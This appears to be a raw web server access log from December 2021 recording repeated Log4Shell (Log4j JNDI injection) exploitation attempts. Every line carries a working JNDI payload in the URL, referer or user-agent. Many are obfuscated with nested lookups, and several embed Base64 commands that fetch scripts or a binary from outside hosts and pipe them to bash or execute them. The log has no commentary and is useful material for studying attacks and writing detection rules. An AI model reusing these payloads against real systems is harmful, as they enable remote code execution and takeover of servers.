195.54.160.149 - - [17/Dec/2021:03:09:37 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
45.83.65.155 - - [17/Dec/2021:13:06:16 +0100] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-o4wlecdljwbcxpyg%7D HTTP/1.1" 200 10046 "${${::-j}ndi:dns://45.83.64.1/securityscan-tqp5kfjpbji4ujhb}" "${${::-j}ndi:dns://45.83.64.1/securityscan-dtst3nvsrebozk7u}"
128.90.61.199 - - [17/Dec/2021:13:50:00 +0100] "GET /$%7Bjndi:iiop://128.90.61.199:6311/1639745399%7D HTTP/1.1" 404 5210 "${jndi:iiop://128.90.61.199:6311/1639745399}" "${jndi:iiop://128.90.61.199:6311/1639745399}"
195.54.160.149 - - [17/Dec/2021:23:05:31 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [18/Dec/2021:08:39:13 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [18/Dec/2021:19:29:26 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
36.138.125.72 - - [18/Dec/2021:22:38:12 +0100] "GET /${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 404 5196 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
36.138.125.72 - - [18/Dec/2021:22:38:13 +0100] "GET / HTTP/1.1" 200 30308 "-" "${jndi:ldap://5.101.118.127:1389/Exploit}"
36.138.125.72 - - [18/Dec/2021:22:38:13 +0100] "GET /?v=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
36.138.125.72 - - [18/Dec/2021:22:38:20 +0100] "GET /?id=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
36.138.125.72 - - [18/Dec/2021:22:38:20 +0100] "GET //${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.220.100.248 - - [19/Dec/2021:10:09:43 +0100] "GET /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D HTTP/1.1" 200 30124 "${jndi:ldap://193.3.19.159:53/c}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
128.90.59.60 - - [19/Dec/2021:11:18:36 +0100] "GET /$%7Bjndi:iiop://128.90.59.60:4085/1639909115%7D HTTP/1.1" 404 5210 "${jndi:iiop://128.90.59.60:4085/1639909115}" "${jndi:iiop://128.90.59.60:4085/1639909115}"
107.189.29.181 - - [19/Dec/2021:13:20:39 +0100] "GET / HTTP/1.1" 301 535 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}"
60.31.180.149 - - [19/Dec/2021:17:49:33 +0100] "GET /?v=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
60.31.180.149 - - [19/Dec/2021:17:49:35 +0100] "GET /?id=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [20/Dec/2021:00:46:50 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [20/Dec/2021:11:58:30 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
147.182.202.30 - - [20/Dec/2021:21:08:38 +0100] "GET / HTTP/1.1" 301 535 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')"
195.54.160.149 - - [21/Dec/2021:08:04:49 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
223.111.180.119 - - [21/Dec/2021:14:07:13 +0100] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 301 604 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
223.111.180.119 - - [21/Dec/2021:14:07:14 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
191.232.38.25 - - [21/Dec/2021:18:56:23 +0100] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 301 604 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
191.232.38.25 - - [21/Dec/2021:18:56:24 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
170.210.45.163 - - [21/Dec/2021:23:29:42 +0100] "GET /${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [21/Dec/2021:23:29:43 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://192.46.216.224:1389/Exploit}"
170.210.45.163 - - [21/Dec/2021:23:29:43 +0100] "GET /?s=${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [22/Dec/2021:04:36:48 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
46.105.95.220 - - [22/Dec/2021:09:12:15 +0100] "GET /${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
46.105.95.220 - - [22/Dec/2021:09:12:15 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://192.46.216.224:1389/Exploit}"
46.105.95.220 - - [22/Dec/2021:09:12:15 +0100] "GET /?s=${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.184.152.140 - - [22/Dec/2021:10:41:27 +0100] "GET /${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.184.152.140 - - [22/Dec/2021:10:41:27 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://192.46.216.224:1389/Exploit}"
185.184.152.140 - - [22/Dec/2021:10:41:28 +0100] "GET /?s=${jndi:ldap://192.46.216.224:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [22/Dec/2021:14:27:44 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
5.157.38.50 - - [22/Dec/2021:22:36:00 +0100] "GET /${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 404 5196 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
5.157.38.50 - - [22/Dec/2021:22:36:00 +0100] "GET / HTTP/1.1" 200 30308 "-" "${jndi:ldap://142.93.172.227:1389/Exploit}"
5.157.38.50 - - [22/Dec/2021:22:36:00 +0100] "GET /?s=${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 200 30308 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [23/Dec/2021:00:55:04 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [23/Dec/2021:10:59:38 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [23/Dec/2021:10:59:38 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
185.184.152.140 - - [23/Dec/2021:18:32:19 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://185.203.118.200:1389/Exploit}"
195.54.160.149 - - [23/Dec/2021:21:57:11 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [24/Dec/2021:07:18:53 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [24/Dec/2021:07:18:54 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [24/Dec/2021:17:56:57 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
170.210.45.163 - - [25/Dec/2021:01:23:47 +0100] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [25/Dec/2021:01:23:47 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
195.54.160.149 - - [25/Dec/2021:03:53:27 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [25/Dec/2021:03:53:27 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
